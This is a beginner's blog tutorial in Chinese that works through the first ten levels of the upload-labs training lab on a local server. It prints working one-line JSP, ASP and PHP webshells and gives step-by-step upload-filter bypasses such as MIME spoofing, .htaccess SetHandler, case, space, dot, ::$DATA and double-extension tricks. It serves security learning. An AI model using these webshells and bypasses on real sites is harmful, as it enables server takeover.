file上传代码 ios_上传漏洞 uploadlabs 练习(一)

这周学习下关于文件上传漏洞的知识(小白入门),使用的平台是 upload-labs-master 项目地址:https://github.com/c0ny1/upload-labs

852fbf001bb0375e347603725a870486.png

先来介绍下文件上传漏洞 一. 什么是文件上传漏洞

Web应用程序通常会有文件上传的功能, 例如在 BBS发布图片 , 在个人网站发布ZIP 压缩 包, 在办公平台发布DOC文件等 , 只要 Web应用程序允许上传文件, 就有可能存在文件上传漏洞

二.什么样的网站会有文件上传漏洞

大部分文件上传漏洞的产生是因为Web应用程序没有对上传文件的格式进行严格过滤 , 还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护, 后面我们会讲 到一些常见的解析漏洞, 最后还有一些不常见的其他漏洞, 如 IIS PUT漏洞等

三.文件上传漏洞的危害

上传漏洞与SQL注入或 XSS相比 , 其风险更大 , 如果 Web应用程序存在上传漏洞 , 攻击者甚至可以直接上传一个webshell到服务器上


关于webshell

webshell是以asp、php、jsp等网页文件形式存在的一种命令执行环境,也称其为一种网页后门。一般说来,当Hacker入侵一个网站后,会把这些asp、php木马的后门文件放在该网站的web目录中,和正常的网页文件混杂,其命名可能和正常的文件命名很类似,让人无法第一眼通过文件名判断其为后门文件。然后呢,他就可以利用web请求的方式,用asp或者php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等一系列操作。

webshell的分类

1.根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它)
2.根据脚本名称分类:jsp、asp、aspx、php

几种经典的webshell:

1)jsp的简单的webshell:

Runtime.getRuntime().exec(request.getParameter("i"));%>

2)asp的简单的webshell:

success!!!!eval request("cmd")%>

3)php的简单的webshell:

  • php经典一句话: <?php echo shell_exec($_GET['cmd']);?>

  • 中国菜刀:<?php @eval($_POST['自定义密码']);?> 然后连接菜刀就能直接进服务器了

    好了介绍完这些就开始做题吧(。・∀・)ノ,


Less-1

ea88e1f5faee1c69f8f4a18c79b90ff3.png
先在本地新建一个webshell文件,然后上传webshell 发现失败
76c0ecf2e47c6cb9c565892769104cb3.png
查看源码发现是JS验证,只能上传 .jpg|.png|.gif这三种文件格式
c8354e944de153dc0416a85eb7c1a916.png
对于js验证有三种绕过方法:
  1. 使用浏览器插件。删除检测文件后缀的JS代码,然后上传webshell

  2. 首先把webshell的后缀改成允许上传的.jpg|.png|.gif,绕过JS检测。再抓包把后缀名改成.php,即可上传webshell

  3. 在前端js判断函数中加上可以上传php文件,或者直接删去这一函数

由于是第一题,这里就分别用两种方法绕过演示下  (* ̄3 ̄)╭

先用第2种:
把webshell的后缀php改为png

eed09b5fb78e1f22b686db75dedb1a65.png
然后上传,抓包修改后缀为php, 然后forward发包
24d199c98203124b3b4e93dfcb4f1940.png
上传文件url地址可以在这看到(蓝色选中部分),
654dc404c6707d7cd4f58f9b0ede7e71.png

菜刀连接 地址: http://127.0.0.1/upload-labs-master/upload/webshell.php
d1092911b31b839dc5e905c81dc0f13c.png
成功( ̄︶ ̄)↗ 
2629a9ca35befdbf3c0f33a94781769c.png

来看看第三种绕过:

这时要先猜测判断文件后缀的代码是在前端还是后端,打开burp进行拦截,发现点击上传后,并没有进行发包。可知判断后缀的代码在前端,即用js代码判断的,打开浏览器的审查元素,找到文件上传的js代码

78dfa9783ed305dba9dd7d6c7c17ec09.png
在这里插入图片描述

可以看到蓝色选中区有 checkFile()函数,我们把它删除后再上传

然后同理在F12审查元素中找到路径,菜刀连接。

第一关结束!(提示:上传到upload文件夹的小马别忘删了,因为下面还要用)

Less-2

直接上传,失败,提示文件类型不正确


上传图片发现可以成功
cd5dd8696966671986aae1e2644fe8f4.png

查看源码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

发现这里采用的是后端验证文件类型, 但是他只过滤的文件类型, 并没有过滤文件后缀名, 所以可以上传 php文件,然后修改 content-type 绕过。
(可能会有小伙伴问,文件后缀名不就定义了我文件类型了吗,嗯…其实并不是,文件后缀只是决定了双击打开的方式,比如你用photoshop可以打开一个psd图像文件。把这个文件扩展名改为txt,再拖到photoshop窗口里,还是一样能打开,说明内容完全没有变化,变化的只是双击时的默认打开方式。)

可以看到这题的提示:

152b58b3f6158e343c7eee18f85e2af0.png
关于MIME我这里要说一下(百度百科 是错的哦):
  • 它全名叫多用途互联网邮件扩展(Multipurpose Internet MailExtensions),最初是为了将纯文本格式的电子邮件扩展到可以支持多种信息格式而定制的。后来被应用到多种协议里,包括我们常用的HTTP协议。

  • MIME的常见形式是一个主类型加一个子类型,用斜线分隔。比如text/html、application/javascript、image/png等

  • 在访问网页时,MIME type帮助浏览器识别一个HTTP请求返回的是什么内容的数据,应该如何打开、如何显示。

这里采用的判断方式就是MIME后端验证!
这里有两种绕过方法:↓

PS:

  • 上传php文件时,Content-Type的值是application/octet-stream;

  • 上传jpg文件时,Content-Type的值是image/jpeg

如果服务器通过Content-Type的值判断文件类型,直接上传php文件(webshell),抓包,将Content-Type的值修改为image/jpeg,即可上传php文件(webshell)。

dbde54284d1a63c03965a7368e81f1c7.png

先上传修改后缀名的webshell(webshell.php改为websshell.jpg)进行、抓包修改,后缀名改为webshell.php

07f467505f9fb600ce2bc2875dd3c434.png


然后菜刀连接就行了~( ̄▽ ̄)~*

Less-3

第三题又是一个新类型的题:黑名单限制文件上传,不允许上传.asp|.aspx|.php|.jsp后缀文件。那么要如何绕过呢?
这里说下关于Apache的一些知识:

  • Apache的解析顺序是从右到左开始解析文件后缀的,如果最右侧扩展名不可识别,就继续往左判断。直到遇到可以解析的文件后缀为止

  • 可以上传例如php3, phtml后缀的文件绕过,前提是Apachehttpd.conf中配置有如下代码:AddType application/x-httpd-php .php .php3 .phtml

服务器会将.php3, .phtml后缀的文件当成.php解析。

步骤:
先找到Apache下的httpd.conf文件,然后查找“AddType text/html”,然后在这行代码后面,加上一行AddType application/x-httpd-php .php .php3 .phtml即可

88f8350d98d23c2da4c866deca21c924.png

然后直接上传后缀名为 .phtml的webshell文件,注意这里上传的文件名会改变
ec30e1b96be307ac6796906fddbb15ae.png

连接菜刀
f3a2ea66b75072c1af2847022c545eb2.png

成功( ̄︶ ̄)↗ 
9ace884e998dc58cde667a40e14550c3.png
下一题 Less-4
同样是黑名单过滤,直接看源码吧:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

这题很绝,基本上把那些花里胡哨的后缀都过滤了,但是没有包括.htaccess,可以利用配合Apache的.htaccess文件上传 解析漏洞。

.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过.htaccess文件,可以实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能IIS平台上不存在该文件,该文件默认开启,启用和关闭在httpd.conf文件中配置。

 启用.htaccess
 需要修改httpd.conf文件下的配置,查找关键词AllowOverride,将后面的None改成All

d8939222e49788b556d6140c8f2ca45a.png

然后,上传一个.htaccess内容如下的文件(抓包时删去文件名):

SetHandler application/x-httpd-php
12eb3139580c3cd7a36873bde5a04029.png

这样所有文件都会解析为php,然后再上传图片马(我的菜刀好像有问题,就上传图片马吧),就可以解析:

图片马语句:<?php phpinfo(); ?>

3b311f1c4c02ffee9ead1702531bb3d2.png

成功解析,下一关

Less-5

同样是黑名单限制 这关和上一关相比,就多了个.htaccess文件,但是查看源码发现这题没有统一大小写,所以就可以利用大小写绕过
上传文件webshell.Php

9483fc0a0a6dd8e44c290482264050e9.png

上传成功。可以发现文件名又改变了,连接菜刀时要注意哦
511c64ebfa0ee3096c222656440908b5.png

连接成功

Less-6
查看源码发现还是黑名单,但是这关没有对后缀名进行去空格处理,可在后缀名中加空格绕过

 if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA

上传的.php文件 抓包加上空格就行了。

482bcb50d5ea3c55f7e5f8d579e4cbd1.png

上传成功,查看文件命及路径
2adbf3e8d0f9714b30fc434dddc8c4a6.png

菜刀连接,成功。

Less-7
还是黑名单,但是没有对后缀名进行去.处理,,可在后缀名中加.绕过  ;上传后windows下会自动去掉后缀名中最后的.

3639903b1b00f769d772c8281b0e7c48.png

菜刀连接,成功。

Less-8
黑名单绕过,对比Less-4可以发现Less8少了这一句;

5aff1e9cdf9bb86b3e5b2110f898826c.png

在php+windows的情况下:如果文件名+ ::$DATA, ::$DATA之后的数据当成文件流处理,不会检测后缀名 且保持" ::$DATA"之前的文件名。(原因的话不清楚)
所以这题的绕过方法为:在文件后缀加 ::$DATA
抓包,加上后缀就行了。
f3cf8908eba425b92da0204900775384.png

上传成功。

Less-9

我们先来看下Less2的路径拼接代码:

   if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                    $img_path = UPLOAD_PATH . $_FILES['upload_file']['name'];
                    $is_upload = true;

再看这一关的代码拼接,

  if (move_uploaded_file($_FILES['upload_file']['tmp_name'], UPLOAD_PATH . '/' . $_FILES['upload_file']['name'])) {
                $img_path = UPLOAD_PATH . '/' . $file_name;
                $is_upload = true;
            }

发现5,6,7,8,9关都是一样,路径拼接的是处理后的文件名,导致可以利用类似.php. .(两个点号之间有一个空格)绕过
程序先是删除一个点,再删除一个空格经过处理后,文件名变成.php.,即可绕过。

c0f8378fcee11bb95f36cde0ada8d834.png
a83dbb1dfc246e78f16f788f27e75957.png
上传成功。

Less-10
依旧是黑名单过滤,查看源码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

注意到,这里是将文件后缀名替换为空,于是可以利用双写绕过(不懂的话,百度下str_ireplace这个函数):

$file_name = str_ireplace($deny_ext,"", $file_name);
a4e3e7c2f55c3c61b066a7af6c958f32.png

成功上传。
43b40f52ac970b007e0707cda5063206.png

这次就先总结到这吧,一次不想写太长,后面会补上;觉的我总结的还行的话 求关注呦╰( ̄ω ̄o) 46ac484a2f399a3479bfe109f0414de7.png

沙漏安全团队

奋发努力

拼搏向上

▇ 扫码关注我们哦

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值